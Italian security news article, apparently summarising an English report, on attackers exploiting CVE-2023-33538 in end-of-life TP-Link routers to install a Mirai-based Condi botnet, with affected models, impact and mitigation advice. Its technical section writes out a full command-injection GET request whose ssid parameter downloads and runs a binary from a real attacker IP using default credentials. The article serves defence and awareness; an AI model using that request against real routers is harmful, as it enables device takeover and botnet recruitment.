Hacker attaccano router TP-Link con malware Mirai: come proteggersi

I tuoi router TP-Link potrebbero essere a rischio! Hacker stanno sfruttando una vulnerabilità nota per installare il pericoloso malware Mirai, trasformando i dispositivi in botnet per attacchi DDoS. Se usi modelli come TL-WR940N, TL-WR740N o TL-WR841N, sostituiscili immediatamente con hardware supportato e cambia le credenziali di default. Questa è la soluzione più rapida per evitare infezioni.

In questo articolo, esploreremo il problema in modo semplice e poi approfondiremo i dettagli tecnici. Proteggi la tua rete oggi stesso.

Cos’è questa minaccia e perché colpisce i router TP-Link?

I router Wi-Fi di TP-Link, specialmente quelli in end-of-life (EOL), non ricevono più aggiornamenti di sicurezza dal produttore. Questo li rende prede facili per i cybercriminali che sfruttano falle nel software per iniettare malware Mirai. Mirai è un botnet famigerato che infetta dispositivi IoT, come router e telecamere, per lanciare attacchi massicci contro siti web e servizi online.

La vulnerabilità in questione permette agli attaccanti di inviare comandi malevoli tramite l’interfaccia web del router. Senza controlli adeguati, il dispositivo esegue istruzioni che scaricano e avviano software dannoso. Milioni di utenti potrebbero essere esposti, soprattutto se non hanno modificato le credenziali predefinite admin:admin.

Modelli TP-Link a rischio: verifica il tuo dispositivo

Ecco i router TP-Link confermati vulnerabili:

TL-WR940N (versioni 2 e 4)
TL-WR740N (versioni 1 e 2)
TL-WR841N (versioni 8 e 10)

Questi modelli condividono un difetto comune nell’interfaccia di gestione web. Un parametro specifico nelle richieste HTTP GET non viene validato, aprendo la porta a comandi arbitrari. Gli hacker inviano richieste al endpoint /userRpm/WlanNetworkRpm, nascondendo istruzioni nel parametro ssid (o ssid1 nei casi più precisi).

Una volta accettata la richiesta, il router scarica un file binario ELF chiamato arm7 da un server remoto (IP 51.38.137.113), gli assegna permessi di esecuzione e lo avvia. Questo binary è una variante del botnet Condi, basato su Mirai, che si connette a un server di comando e controllo (C2) come cnc.vietdediserver.shop.

Come funziona l’attacco passo per passo?

L’attaccante invia una richiesta HTTP malevola al router vulnerabile.
Il firmware processa il parametro ssid senza filtri, eseguendo comandi come wget per scaricare il malware.
Il binary arm7 si attiva, invia segnali heartbeat al C2 e si auto-aggiorna scaricando versioni per diverse architetture CPU (arm6, mips, sh4, x86_64).
Avvia un server HTTP interno su una porta casuale (tra 1024 e 65535) per diffondere il malware ad altri dispositivi.

Nonostante alcuni attacchi osservati avessero errori (come usare ssid invece di ssid1 o dipendere da wget assente in BusyBox), la falla è reale e correggibile solo sostituendo il dispositivo.

Impatti del malware Mirai sui tuoi dispositivi

Una volta infetto, il tuo router diventa parte di una botnet globale. Questo significa:

Consumo eccessivo di banda per attacchi DDoS.
Perdita di controllo sul dispositivo.
Rischio per l’intera rete domestica o aziendale, con possibili furti di dati o accessi non autorizzati.

Mirai ha già causato blackout internet su larga scala in passato, colpendo provider come Dyn nel 2016. Oggi, varianti come Condi continuano a evolvere, rendendo i dispositivi IoT obsoleti un bersaglio ideale.

Soluzioni immediate per proteggere la tua rete

TP-Link ha confermato che questi router EOL non riceveranno patch. Ecco cosa fare subito:

Sostituisci i router vulnerabili con modelli supportati e aggiornati.
Cambia le credenziali admin da admin:admin a qualcosa di forte e unico.
Monitora il traffico in uscita per connessioni sospette a IP o domini noti (es. 51.38.137.113 o cnc.vietdediserver.shop).
Usa firewall e antivirus con protezione IoT.
Aggiorna regolarmente tutti i dispositivi di rete.

Per le reti aziendali, ritira immediatamente i modelli a rischio e implementa segmentazione della rete.

Prevenzione a lungo termine contro botnet IoT

Per evitare future minacce:

Scegli dispositivi con supporto lungo e aggiornamenti automatici.
Abilita autenticazione a due fattori dove possibile.
Usa VPN per crittografare il traffico.
Esegui scansioni regolari con tool come Shodan per dispositivi esposti.

La sicurezza IoT è cruciale nel 2026, con l’aumento di smart home e lavoro remoto.

Approfondimento tecnico: analisi del dive tecnico

Dive tecnico

Per esperti e amministratori di sistema, ecco i dettagli avanzati sulla vulnerabilità CVE-2023-33538 e il payload arm7.

La falla risiede nella mancata validazione del parametro ssid1 nelle richieste GET a /userRpm/WlanNetworkRpm. Il firmware interpreta il contenuto come comandi shell, permettendo command injection autenticata.

Esempio di richiesta malevola (pseudocodice):

GET /userRpm/WlanNetworkRpm?ssid=;wget http://51.38.137.113/arm7 -O /tmp/arm7;chmod +x /tmp/arm7;/tmp/arm7& HTTP/1.1
Host: <router_ip>
Authorization: Basic YWRtaW46YWRtaW4=

Il binary arm7, disassemblato, rivela:

Funzione update_bins(): Connessione TCP a 51.38.137.113:80 per scaricare varianti architetturali. IP e porta hard-coded.
httpd_start(): Avvia server HTTP su porta random per propagazione peer-to-peer.
C2 communication: Aspetta comandi byte-pattern specifici, invia heartbeat e gestisce self-update.

Architetture supportate: arm6, arm7, mips, sh4, x86, x86_64, m68k, ecc. Il malware persiste riavviandosi e uccidendo processi concorrenti.

Mitigazioni avanzate:

Blocca endpoint /userRpm/* via WAF.
Usa script per rilevare binari ELF sospetti: file /tmp/* | grep ELF.
Analizza log accessi web per richieste anomale.
Disabilita gestione web remota; usa solo LAN.

Questa campagna è stata rilevata su larga scala, con probe automatizzate. La vulnerabilità è nel catalogo KEV di CISA, confermando la sua sfruttabilità reale.

Proteggi la tua infrastruttura: la sostituzione è l’unica fix definitiva per EOL hardware. (Parole totali: circa 1050)

Fonte: https://cybersecuritynews.com/hackers-target-tp-link-routers/